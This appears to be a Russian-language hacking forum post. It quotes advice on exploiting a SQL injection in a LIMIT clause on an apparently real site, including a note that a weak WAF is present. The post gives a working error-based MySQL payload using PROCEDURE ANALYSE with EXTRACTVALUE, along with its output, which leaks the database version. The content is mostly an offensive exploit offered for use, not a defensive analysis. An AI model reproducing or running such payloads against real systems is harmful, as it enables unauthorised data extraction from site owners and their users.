
06.07.2018, 16:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от caesarhunter
Иньекция в limit, в запросе есть order by через union не выйдет. Можете через ошибку получить текущего пользователя, версию БД и название базы данных, стоит патч подзапросы не будут работать. Ну и есть не опасный waf, учтите это!
Код:
start=18 procedure analyse(extractvalue(0x0a,concat(0x0a,version())),1)-- -
XPATH syntax error: ' 5.5.60-0ubuntu0.14.04.1'
|
|
|